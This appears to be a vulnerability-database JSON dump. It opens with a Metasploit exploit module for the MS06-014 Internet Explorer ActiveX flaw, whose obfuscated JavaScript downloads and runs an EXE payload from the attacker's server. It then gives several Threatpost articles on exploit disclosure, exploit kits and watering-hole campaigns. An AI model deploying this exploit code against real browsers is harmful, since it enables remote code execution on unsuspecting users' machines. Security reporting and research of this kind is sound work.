'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',\n '{0006F033-0000-0000-C000-000000000046}',\n '{0006F03A-0000-0000-C000-000000000046}',\n ],\n #:rank => ExcellentRanking # reliable exe writer\n })\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution',\n 'Description' => %q{\n This module exploits a generic code execution vulnerability in Internet\n Explorer by abusing vulnerable ActiveX objects.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'hdm',\n ],\n 'References' =>\n [\n # MDAC\n [ 'MSB', 'MS06-014' ],\n [ 'CVE', '2006-0003' ],\n [ 'OSVDB', '24517' ],\n # WMI Object Broker\n [ 'MSB', 'MS06-073' ],\n [ 'CVE', '2006-4704' ],\n [ 'OSVDB', '30155' ],\n ],\n 'Payload' =>\n {\n 'Space' 
=> 2048,\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n\n # Patched\n [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],\n # Found in mpack\n [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],\n\n # Patched\n [ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],\n\n # These are restricted by site (might be exploitable via DNS spoofing + SSL fun)\n [ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],\n [ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],\n\n # Visual Studio components, not marked as safe\n [ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],\n [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],\n [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],\n [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],\n [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],\n\n #\n # The controls below can launch the \"installing component\" dialogs...\n #\n\n # Not marked as safe\n [ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],\n\n # Not marked as safe\n [ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],\n\n # Found exploitable in the wild (no details)\n [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],\n\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 11 2006'))\n end\n\n def on_request_uri(cli, request)\n\n if (request.uri.match(/payload/))\n return if ((p = regenerate_payload(cli)) == nil)\n data = generate_payload_exe({ :code => 
p.encoded })\n print_status(\"Sending EXE payload\")\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n # Build out the HTML response page\n var_html = rand_text_alpha(rand(30)+2)\n var_func_exploit = rand_text_alpha(rand(30)+2);\n var_func_go = rand_text_alpha(rand(30)+2);\n var_func_createo = rand_text_alpha(rand(30)+2);\n var_exe_name = rand_text_alpha(rand(30)+2);\n var_objects = ''\n\n # Build the object list based on target selection\n if (target.name == 'Automatic')\n targets.each do |t|\n next if not t['CLSID']\n var_objects += t['CLSID'].unpack('C*').map{|c| \" '#{c.chr}' \"}.join(\"+\") + \",\"\n end\n else\n var_objects += target['CLSID'].unpack('C*').map{|c| \" '#{c.chr}' \"}.join(\"+\") + \",\"\n end\n\n\n content = %Q^\n<html><head><title></title>\n<script language=\"javascript\">\n\nfunction #{var_func_createo}( o , n ) {\n var r = null;\n\n try { eval(\"r=o\" + \".C\" + \"re\" + \"ate\" + \"Ob\" + \"je\" + \"ct(n)\" ) }catch(e){}\n\n if (! r) {\n try { eval(\"r=o\" + \".Cr\" + \"ea\" + \"teO\" + \"bj\" + \"ect(n,'')\" ) }catch(e){}\n }\n\n if (! r) {\n try { eval(\"r=o\" + \".Cr\" + \"ea\" + \"teO\" + \"bj\" + \"ect(n,'','')\" ) }catch(e){}\n }\n\n if (! r) {\n try { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"je\" + \"ct('',n)\" ) }catch(e){}\n }\n\n if (! r) {\n try { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"ject(n,'')\" ) }catch(e){}\n }\n\n if (! 
r) {\n try { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"ject(n)\" ) }catch(e){}\n }\n\n return( r );\n}\n\nfunction #{var_func_go}( a ) {\n\n var s = #{var_func_createo}( a, \"W\" + \"Sc\" + \"ri\" + \"pt\" + \".S\" + \"he\" + \"ll\" );\n\n var o = #{var_func_createo}( a, \"A\" + \"DO\" + \"D\" + \"B.S\" + \"tr\" + \"eam\" );\n\n var e = s.Environment( \"P\" + \"ro\" + \"ce\" + \"ss\" );\n\n\n var url = document.location + '/p' + 'ay' + 'lo' + 'ad';\n var xml = null;\n var bin = e.Item( \"T\" + \"E\" + \"M\" + \"P\" ) + \"\\\\\\\\#{var_exe_name}\" + \".e\" + \"xe\";\n var dat;\n\n try { xml=new XMLHttpRequest(); }\n catch(e) {\n try { xml = new ActiveXObject(\"Microsoft.XMLHTTP\"); }\n catch(e) {\n xml = new ActiveXObject(\"MSXML2.ServerXMLHTTP\");\n }\n }\n\n if (! xml) {\n return(0);\n }\n\n xml.open(\"GET\", url, false);\n xml.send(null);\n dat = xml.responseBody;\n\n o.Type = 1 ;\n o.Mode = 3 ;\n o.Open ( ) ;\n o.Write ( dat ) ;\n o.SaveToFile ( bin, 2) ;\n\n s.Run ( bin , 0 );\n}\n\nfunction #{var_func_exploit}( ) {\n var i = 0;\n var t = new Array( #{var_objects} null );\n\n while (t[i]) {\n var a = null;\n\n if (t[i].substring(0,1) == '{') {\n a = document.createElement(\"object\");\n a.setAttribute(\"cl\" + \"as\" + \"sid\", \"cl\" + \"s\" + \"id\" +\":\" + t[i].substring( 1, t[i].length - 1 ) ) ;\n } else {\n try { a = new ActiveXObject(t[i]); } catch(e){}\n }\n\n if (a) {\n try {\n var b = #{var_func_createo}( a , \"W\" + \"Sc\" + \"ri\" + \"pt\" + \".S\" + \"he\" + \"ll\" ) ;\n if (b) {\n #{var_func_go}( a ) ;\n return(0) ;\n }\n } catch(e){\n }\n }\n i++;\n }\n}\n</script>\n</head>\n<body onload='#{var_func_exploit}()'>\n#{var_html}\n</body>\n</html>\n\n^\n\n\n content = Rex::Text.randomize_space(content)\n\n print_status(\"Sending exploit HTML...\")\n\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_createobject.rb"}], "threatpost": [{"lastseen": "2018-10-06T23:00:02", "bulletinFamily": "info", "cvelist": ["CVE-2010-1885"], "description": "**BERLIN**\u2013Just whispering the words \u201cvulnerability disclosure\u201d within earshot of a security researcher or vendor security response team members can put you in fear for your life these days. The debate is so old and worn out that there is virtually nothing new left to say or chew on at this point. However, the question of when to disclose that a given vulnerability is being exploited in the wild is an entirely different one.\n\nRegardless of which sect or splinter cell you belong to in the [disclosure debate](<https://threatpost.com/exploit-sales-the-new-disclosure-debate/100641>), for most people it all comes down to finding the most effective way to get a fix published and in the hands of users as quickly as possible. That could mean coordinated disclosure with the vendor or full disclosure on a public mailing list or something in between. But the lines get a little blurry when the discussion veers into the appropriate moment to tell the public that a given vulnerability is being actively exploited. It may seem obvious that users should be told as soon as possible, giving them the best chance at defending themselves or their networks. But there are many other factors in play, mainly the fact that alerting users also will wake up the attacker community.\n\nThat\u2019s no small consideration, especially when it concerns a vulnerability in a widely deployed application such as Internet Explorer, Adobe Flash or Java. 
Researchers from Microsoft and Lancope looked at public exploitation notifications in a handful of major cases from the last few years and found that, as with many things in life, timing is everything.\n\n\u201cExploitation disclosure is a good thing at any time, but the question is when and can it cause problems?\u201d said Tom Cross of Lancope, who, along with Holly Stewart of Microsoft, gave a talk on the topic at the Virus Bulletin 2013 conference here Wednesday.\n\nOne of the cases the pair examined was the Windows Help and Support Center CVE-2010-1885 vulnerability. That bug was disclosed publicly on the Full Disclosure mailing list in June 2010 and the original disclosure included a proof-of-concept exploit. Not long afterward, the exploit was integrated into some attack toolkits and attacks against the vulnerability spiked. In other cases, researchers have gone through the coordinated disclosure process, working with vendors to get a fix ready before announcing the bug, and once the announcement is made, exploitation attempts will immediately increase as attackers pull apart the patch to find the bug behind it.\n\nNot unlike the dreaded disclosure debate, the decision on when to notify users of exploitation attempts depends upon a number of factors. If a vulnerability is particularly severe and there are ongoing, widespread attacks against it, the vendor may well choose to notify users even if there\u2019s no patch available. On the other hand, if the attacks are targeted and relatively spotty and the vendor has no workaround ready, it may decide to hold off on notification.\n\n\u201cIf there\u2019s nothing you can tell the users to do, there\u2019s not a lot of point in disclosing the exploits,\u201d he said. \u201cIt depends on the level of exploitation, the geographic distribution, is a patch available, when will it be if it\u2019s not. 
If the answer is to tell people not to use a piece of software that\u2019s necessary to do business, the reality is that\u2019s not going to happen.\u201d\n\nIt\u2019s also true that the decision is not always solely in the hands of the vendor or even the researcher who discovered the vulnerability. In some cases, a third party security company may notice exploit attempts against a previously unknown vulnerability and take the step of notifying customers.\n\n\u201cThere is no one answer,\u201d Cross said.\n", "modified": "2013-10-02T17:38:20", "published": "2013-10-02T10:04:52", "id": "THREATPOST:243FAEE6E3B441A3C58FD1A9BF0E6A2D", "href": "https://threatpost.com/researchers-ponder-when-to-notify-users-of-public-vulnerability-exploits/102487/", "type": "threatpost", "title": "Researchers Ponder When to Notify Users of Public Vulnerability Exploits", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:30", "bulletinFamily": "info", "cvelist": ["CVE-2010-1885"], "description": "[](<https://threatpost.com/huge-increase-seen-attacks-windows-help-center-flaw-070110/>)Attackers are ramping up their attempts to exploit the recently disclosed [vulnerability in the Windows Help and Support Center in Windows XP](<https://threatpost.com/googler-drops-windows-zero-day-microsoft-unhappy-061010/>). There have been targeted attacks against the flaw for two weeks now, but experts have noticed a major increase in the volume and spread of them in recent days.\n\nMicrosoft\u2019s security group has been looking at data coming back from machines running the company\u2019s anti-malware software, as well as from other data sources, and found that [attacks against the Windows Help and Support Center flaw](<http://blogs.technet.com/b/mmpc/archive/2010/06/30/attacks-on-the-windows-help-and-support-center-vulnerability-cve-2010-1885.aspx>) have been increasing dramatically over the last few days. 
Since the first targeted attacks against the vulnerability began in mid-June, the volume and diversity of exploitation attempts have been on the rise, Microsoft said.\n\nAccording to Microsoft\u2019s data on the attack, more than 10,000 unique machines have seen this attack at least once. And that data obviously isn\u2019t comprehensive, as it typically just includes data sent back from PCs running Microsoft\u2019s security software. But the company added that the attacks also have been widely distributed around the world, with the U.S., Russia, Germany and a few other countries seeing the most attacks so far. \n\n\n\nThe company said that most of the original attacks included one payload, a piece of malware called Obitel that serves as a downloader for subsequent malware installations. But the current wave of attacks has a number of different payloads, including a couple of Trojan downloaders that end up on victim machines after several script redirections. \n\nMicrosoft has released a [FixIt tool for the Windows Help and Support Center flaw](<http://support.microsoft.com/kb/2219475>), a weakness that also affects Windows Server 2003. 
The company has not yet released a patch for the vulnerability, which was disclosed in early June.\n", "modified": "2018-08-15T12:28:25", "published": "2010-07-01T11:15:39", "id": "THREATPOST:A0E12A73898C41CD87CEBAD62A9C9D5A", "href": "https://threatpost.com/huge-increase-seen-attacks-windows-help-center-flaw-070110/74168/", "type": "threatpost", "title": "Huge Increase Seen in Attacks on Windows Help Center Flaw", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:25", "bulletinFamily": "info", "cvelist": ["CVE-2010-1885"], "description": "[](<https://threatpost.com/microsoft-25000-computers-attacked-latest-windows-zero-day-071410/>)The Windows Help and Support Center vulnerability that was patched with yesterday\u2019s [MS10-042 bulletin](<https://threatpost.com/ms-patch-tuesday-googler-zero-day-fixed-33-days-071310/>) was under active attack by malware miscreants, especially in Europe where Microsoft tracked about 25,000 attempts to exploit the vulnerability.\n\nAccording to Microsoft\u2019s Holly Stewart, the attacks escalated significantly when the company announced the issue would be fixed in this month\u2019s Patch Tuesday.\n\nIn a blog post to the Microsoft Malware Protection Center (MMPC) [blog](<http://blogs.technet.com/b/mmpc/archive/2010/07/13/update-on-the-windows-help-and-support-center-vulnerability-cve-2010-1885.aspx>), Stewart said the attacks started a few weeks ago and have continued to expand and some new attack patterns have come into play. \n\n#### [ [MS Patch Tuesday: Googler Zero-Day Fixed in 33 Days](<https://threatpost.com/ms-patch-tuesday-googler-zero-day-fixed-33-days-071310/>) ]\n\n_The attacks that we have witnessed in the wild work only on Windows XP (not Windows 2003). 
Early on, we saw attackers incorporate code to single out Windows XP targets, but more recently the attackers have been less discriminant, attempting this attack on a variety of operating systems, about half of which were not susceptible because the exploit code could have only been successful on a vulnerable version of Windows XP. _\n\nAs of midnight on July 12 (GMT), over 25,000 distinct computers in over 100 countries/regions have reported this attack attempt at least one time, Stewart said. There was a \u201cfairly large increase\u201d over this past weekend, shortly after Microsoft announced that an update would be provided to fix this issue with the July security bulletin release.\n\n#### [ SEE: [Googler Drops Windows Zero-Day, Microsoft Unhappy](<https://threatpost.com/googler-drops-windows-zero-day-microsoft-unhappy-061010/>) ]\n\nWhere were the attacks spotted?\n\n_Although Portugal has remained one of the most targeted areas, attacks on Russian systems have surpassed it over the past few weeks. Russia has now seen more than ten times the number of attack attempts per computer in comparison to the global average. Other countries/regions that have seen more than the global average are predominantly in Europe and the UK. 
The UK, in particular, was one of the regions in which we witnessed a surge in attack attempts over this past weekend._\n\nStewart said Microsoft tracked attack attempts in over 100 countries/regions.\n", "modified": "2018-08-15T12:25:04", "published": "2010-07-14T16:25:37", "id": "THREATPOST:53F6ADA586C083C4B07DDECFA9D7DBEC", "href": "https://threatpost.com/microsoft-25000-computers-attacked-latest-windows-zero-day-071410/74208/", "type": "threatpost", "title": "Microsoft: 25,000 Computers Attacked With Latest Windows Zero Day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:16", "bulletinFamily": "info", "cvelist": ["CVE-2009-0927"], "description": "[](<https://threatpost.com/new-pdf-attack-targets-aviation-defense-industry-091312/>)FireEye reported today it had detected a new critical PDF attack targeting the aviation defense industry. Malware Page exploits a [stack-based buffer overflow vulnerability in Adobe Acrobat and Adobe Reader](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>). An attacker would be able to execute code remotely via a crafted argument to the getIcon method of a Collab object, according to the CVE alert.\n\nWhen a user opens the infected PDF, the exploit creates an executable file, which drops a DLL and opens a backdoor connection on TCP port 49163, FireEye said in its analysis. The malware opens connections to IP addresses in Germany and the Bahamas and maintains a detailed log of all network communications. 
\nSimultaneously, the attack drops a decoy PDF document which is an invitation to an actual defense industry event.\n", "modified": "2013-04-17T16:31:34", "published": "2012-09-13T19:46:42", "id": "THREATPOST:1B37290C48B43298A5C4751356F68B70", "href": "https://threatpost.com/new-pdf-attack-targets-aviation-defense-industry-091312/77011/", "type": "threatpost", "title": "New PDF Attack Targets Aviation Defense Industry", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:29", "bulletinFamily": "info", "cvelist": ["CVE-2010-0188", "CVE-2010-1885"], "description": "There are a number of compromised sites on the popular blogging platform, WordPress, which, according to [a Trend Labs report](<http://blog.trendmicro.com/compromised-wordpress-sites-drive-users-to-blackhole-exploit-kit>), are actively infecting users with the [CRIDEX worm](<https://threatpost.com/video-new-banking-trojan-caught-breaking-captcha-013012/>).\n\nThe infections are part of a [social engineering](<https://threatpost.com/mass-wordpress-compromise-fuels-cridex-worm-outbreak-032212/>) campaign that lures users with emails purporting to come from trusted sources like [LinkedIn](<http://www.linkedin.com/>) and [the Better Business Bureau](<http://www.bbb.org/>), Trend Labs warned.\n\nE-mails purporting to come from the Better Business Bureau inform their recipients of a (non-existent) complaint lodged against their business. The email includes a link to the \u201cComplaint Report,\u201d which leads to one of the infected WordPress sites.\n\nPhony LinkedIn emails pose as invitation notifications and pending messages. 
They include a number of links, all of which lead to compromised WordPress sites.\n\nAccording to Trend researchers, users who click the links are subject to Web based attacks that [target a vulnerability in Adobe\u2019s Reader and Acrobat](<https://threatpost.com/waves-attacks-target-adobe-reader-bug-2010-022212/>) software ([CVE-2010-0188](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188>)) and a common Windows Help Center vulnerability ([CVE-2010-1885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>)). After exploiting the vulnerabilities, attackers push copies of the Blackhole exploit kit to infect users with the CRIDEX worm.\n\nTrend Labs reports that WORM_CRIDEX.IC is generating a number of random domains using domain generating algorithms (DGA). The technique is commonly used to evade law enforcement and botnet take-downs. The behavior of the sample is dependent upon the specific configuration file, which, in Trend Labs case, was unavailable to them. However, based on their static analysis, the malware is capable of executing and deleting files and retrieving certificates from a certificate store.\n\nThis isn\u2019t the first time that [WordPress](<http://wordpress.org/>) sites have been used to push the Blackhole Exploit kit. 
In November of last year, similar reports surfaced in which [WordPress users were being re-directed](<https://threatpost.com/compromised-wordpress-sites-redirecting-black-hole-exploit-kit-servers-110211/>) to servers hosting the Blackhole kit.\n", "modified": "2013-04-17T20:05:35", "published": "2012-03-22T15:44:13", "id": "THREATPOST:0A9F9D2C917F57EAE16B15B6166B45F6", "href": "https://threatpost.com/mass-wordpress-compromise-fuels-cridex-worm-outbreak-032212/76357/", "type": "threatpost", "title": "Mass WordPress Compromise Fuels CRIDEX Worm Outbreak", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:52", "bulletinFamily": "info", "cvelist": ["CVE-2010-0188", "CVE-2010-1885"], "description": "**UPDATE:** A big wave of emails purporting to be Craigslist notifications but containing links to websites hosting the [Black Hole exploit kit](<https://threatpost.com/black-hole-exploit-kit-available-free-052311/>) hit the Internet yesterday, a day that already was filled with drama surrounding the LinkedIn password dump.\n\nThe malicious emails, 150,000 of which were caught by [Websense](<http://community.websense.com/blogs/securitylabs/archive/2012/06/06/malicious-urls-in-fake-craigslist-emails.aspx>) Security Lab\u2019s Cloud Email Security portal yesterday, attempt to convince recipients that \u201cFURTHER ACTION IS REQUIRED TO COMPLETE [THEIR] REQUEST!!!\u201d The emails go on to claim that recipients must follow the (malicious) link below in order to publish, edit or delete their ad or verify their email address. At the bottom of the email is a bold and capped piece of text that helpfully advises that users \u201cKEEP THIS EMAIL.\u201d\n\nIt is not clear if these emails are just blanketing random email addresses or exclusively targeting individuals who are currently running ads on Craigslist. 
Websense officials didn\u2019t respond to a request for clarification on that point.\n\nIn an email received after publication Thursday afternoon, a Websense spokesperson told Threatpost that the emails did not appear to be targeted specifically toward individuals running ads on Craigslist, but rather that they seemed to be part of a broad spam campaign. \n\n\nWebsense lists \u201cModels for fine\u201d (systems / network), \u201cStudio4PaintWorkCatskills\u201d (education), and \u201cShow Your Art\u201d (cars+trucks) as a few of the email subjects popping up in the scam. Websense also reports that the malicious emails have seemingly legitimate sender addresses and are convincingly similar in appearance to real automated Craigslist notifications.\n\nThe malicious links in the emails are leading users to a compromised WordPress page containing obfuscated JavaScript in the form of an iframe. According to Websense, the attackers are exploiting [CVE-2010-0188](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188>) and [CVE-2010-1885](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>).\n", "modified": "2013-04-17T20:03:31", "published": "2012-06-07T16:27:03", "id": "THREATPOST:A53F2293D6BF2EC7D120A2CC2B3D2524", "href": "https://threatpost.com/fake-automated-craigslist-email-notifications-link-blackhole-exploit-kit-060712/76661/", "type": "threatpost", "title": "Fake Automated Craigslist Email Notifications Link to Blackhole Exploit Kit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:40", "bulletinFamily": "info", "cvelist": ["CVE-2009-0927", "CVE-2010-0188", "CVE-2013-0422"], "description": "**Update:** _Aaron Harison, president of the Center for American Freedom, told Threatpost this morning that the issue has been resolved and the site is no longer serving malware. 
_** **\n\nHackers have latched on to the NSA surveillance story\u2014literally.\n\nA news story on the outing of whistleblower Edward Snowden posted to the Washington Free Beacon is serving malware redirecting visitors to a malicious site where more malware awaits. The Free Beacon site remains infected, according to Invincea researchers, who said they have contacted the news organization about the attack. The story is being linked to by the popular Drudge Report and it\u2019s likely to have snared a pretty good number of victims so far.\n\nThe attack on the Free Beacon is similar to a previous [watering hole attack carried out against a number of other Washington, D.C.-based media outlets](<http://threatpost.com/d-c-media-sites-hacked-serving-fake-av/>), including radio station WTOP, Federal News Radio and the site of technology blogger John Dvorak. Invincea researcher Eddie Mitchell wrote on the company\u2019s blog that several other Free Beacon pages are also serving javascript, including the site\u2019s main index page. The javascript drops an iframe that sends traffic offsite to a page hosting the Fiesta Exploit Kit.\n\n\u201cThis exploit appears to be the same as used against other media sites to infect readers of these websites and part of a concerted campaign against media sites to infect their visitors by exploiting vulnerabilities in Java,\u201d Mitchell wrote. \u201c\n\nMitchell cautions that this attack isn\u2019t being detected yet by security companies because signatures associated with the attack are different from previous campaigns.\n\nThe Free Beacon attack is infecting users with the [ZeroAccess rootkit](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/>), as well as scareware. ZeroAccess is a virulent [peer-to-peer botnet](<http://threatpost.com/number-of-peer-to-peer-botnets-grows-5x/>) that has been folded into a number of commercial exploit kits including Blackhole. 
The malware makes outbound communication requests to a number of command and control servers including e-zeeinternet[.]com, cinnamyn[.]com and twinkcam[.]net, from where the additional malware is loaded onto victim machines.\n\nA little more than a month ago, the campaigns against WTOP and sister station Federal News Radio were discovered. The exploits targeted Java and Adobe plug-ins and were used to spread scareware. Content on both stations is heavily political and the attacks could have been a jumping off point for a larger attack against federal employees who use the site as a resource. Unlike other watering hole attacks that lead to espionage campaigns against activists or political leaders, this one was serving malware usually associated with cybercrime.\n\nThe Dvorak site was also attacked a month ago and malware was discovered on the site\u2019s [WordPress configuration files](<http://threatpost.com/hackers-using-brute-force-attacks-harvest-wordpress-sites-041513/>). Invincea said at the time that it used Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. The browser was pulling a Java app from the attacker\u2019s site and connecting to one of two Russian domains downloading Amsecure malware, which is part of the Kazy malware family, which is known for ransomware and scareware attacks. Three Java and Reader exploits were discovered on the Dvorak site: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. 
These exploits lead to a landing page hosting the Black Hole exploit kit and the Amsecure attacks.\n", "modified": "2013-06-12T16:59:18", "published": "2013-06-10T16:17:14", "id": "THREATPOST:988117842525F1F414002817E6166A11", "href": "https://threatpost.com/nsa-whistleblower-article-redirects-to-malware/100930/", "type": "threatpost", "title": "Free Beacon Article Redirects to ZeroAccess Rootkit, Fake AV", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:49", "bulletinFamily": "info", "cvelist": ["CVE-2009-0927", "CVE-2010-0188", "CVE-2013-0422"], "description": "Websites belonging to a number of Washington, D.C.-area media outlets have been compromised in a series of opportunistic attacks with criminals using a watering-hole tactic to spread scareware, or phony antivirus software.\n\nPopular D.C. radio station WTOP, sister station Federal News Radio, and the site of technology blogger John Dvorak, were infected with exploits targeting third-party Java or Adobe browser plug-ins. The exploits redirect site visitors to an exploit kit serving a scareware executable known as Amsecure.\n\nAs of Tuesday morning, WTOP was still serving malware. The source of the attacks on WTOP and Federal News Radio has not been determined, and it still could be that these are a jumping off point for a larger attack against Federal employees who frequent those sites as a D.C. news source. Media sites have been targeted with more frequency in recent months, and on a variety of levels. 
But for now, experts are not calling these targeted attacks.\n\n\u201cTypically with \u2018watering hole\u2019 style attacks, the threat actors are targeting a very specific group of users or organizations in order to implant malware (remote access Trojan) that allows for access to the victim\u2019s network (as we saw with the recent DoL compromise),\u201d said [Invincea](<http://www.invincea.com/2013/05/k-i-a-wtop-com-fednewsradio-and-dvorak-blog-site-serving-malware-media-sites-compromised-to-push-fake-av/>) in a statement provided to Threatpost. \u201cIn the case of these three sites which are obviously visited by a much larger audience and based on the type of malware observed (crimeware vs. RAT) our assumption is that a specific user group is more than likely not being targeted. Theft of online credentials and/or loss of additional PII is the likely goal of the attacker in these cases.\u201d\n\nZscaler, meanwhile, said [the three attacks shared another commonality](<http://research.zscaler.com/2013/05/popular-media-sites-involved-in-mass.html>): the attack sites were hosted at dynamic DNS providers and the attacks are triggered only when it detects the user is visiting via Internet Explorer. Zscaler also identified three other media sites as compromised: The Christian Post, Real Clear Science and Real Clear Policy.\n\nThe Dvorak site, meanwhile, may be offering up more clues on the attack than the other two. Invincea said it visited the site using Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. 
An admin for the Dvorak site posted a note that malware had been discovered in the site\u2019s wp-config.php file, which is the main configuration file for the WordPress content management system.\n\n\u201cGiven the amount of attention WordPress has received both recently and historically by miscreants seeking to hijack legitimate websites in order to drive user traffic to malware landing pages, this came as no surprise to us,\u201d Invincea security engineer Eddie Mitchell said.\n\nUpon landing on the Dvorak site, IE pulls a Java application from the attacker\u2019s site and connects to one of two malicious domains, registered to a Russian domain. The Amsecure malware is downloaded and a desktop shortcut is installed, called Internet Security 2013[.]ink.\n\nAmsecure is part of the Kazy malware family. Previous variants of the malware take over the desktop and display a warning screen indicating the computer has been infected along with a phony scanner tool that the attacker hopes will scare the user into buying the fake antivirus program.\n\nInvincea was also able to discover three exploits on the Dvorak landing page for Java and Adobe Reader: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. 
These exploits lead to a landing page hosting the Black Hole exploit kit and the Amsecure attacks.\n", "modified": "2013-05-09T20:01:56", "published": "2013-05-07T12:58:12", "id": "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62", "href": "https://threatpost.com/d-c-media-sites-hacked-serving-fake-av/100268/", "type": "threatpost", "title": "Hacked Media Sites Serving Fake AV Malware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:51", "bulletinFamily": "info", "cvelist": ["CVE-2007-5659", "CVE-2009-0927", "CVE-2009-4324"], "description": "[](<https://threatpost.com/main-php-nuke-site-compromised-050710/>)The main site for the PHP-Nuke content management system software has been compromised and is serving malicious iFrame exploits to visitors. \n\nResearchers at [Websense](<http://community.websense.com/blogs/securitylabs/archive/2010/05/07/phpnuke-org-has-been-compromised.aspx>) found that the phpnuke.org site is currently serving several different exploits. The attack uses the common iFrame-redirection technique to hijack users\u2019 browsers and send them off to a malicious site. The code on that site is highly obfuscated and contains exploits for three separate vulnerabilities, two in Internet Explorer and one in Adobe Reader.\n\nThe first attack tries to exploit a four-year-old flaw in Internet Explorer. If that part of the attack works, it downloads a Trojan onto the victim\u2019s machine. The malware then tries to connect to several Web sites, the researchers said. \n\n\n\nThe second attack uses a Java exploit, which ends up with the same infection routine as the first one. \n\nThe third exploit is a PDF exploit \u2014 this actually merges three \nexploits targeting Adobe Reader. First the JavaScript in the HTML page \nchecks if Adobe Reader is exploitable by checking its version number. \nThe version should be between 7 and 7.1.4, 8 and 8.1.7, or 9 and 9.4. 
\nWhen a vulnerable version is found, the exploit downloads the malicious \nPDF file and as it is loaded by Adobe Reader, the malicious ActionScript \nin the file is executed automatically. The PDF itself contains an \nobfuscated ActionScript that utilizes one of the three different PDF \nexploits it hides. These are [CVE-2009-4324](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4324>), \n[CVE-2007-5659](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659>), \nand [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>). \nIf it succeeds, the download and installation of **updates.exe** \nhappens in a similar manner to that described earlier.\n\nThe Websense report says that the exploit is still active on the PHP-Nuke site right now. PHP-Nuke originally was an open-source platform, but is now a commercial product. The main site, however, still serves as a resource page for users and developers. \n", "modified": "2018-08-15T12:49:42", "published": "2010-05-07T15:37:38", "id": "THREATPOST:F74B2BA1E612E4169F1938346DB9CC35", "href": 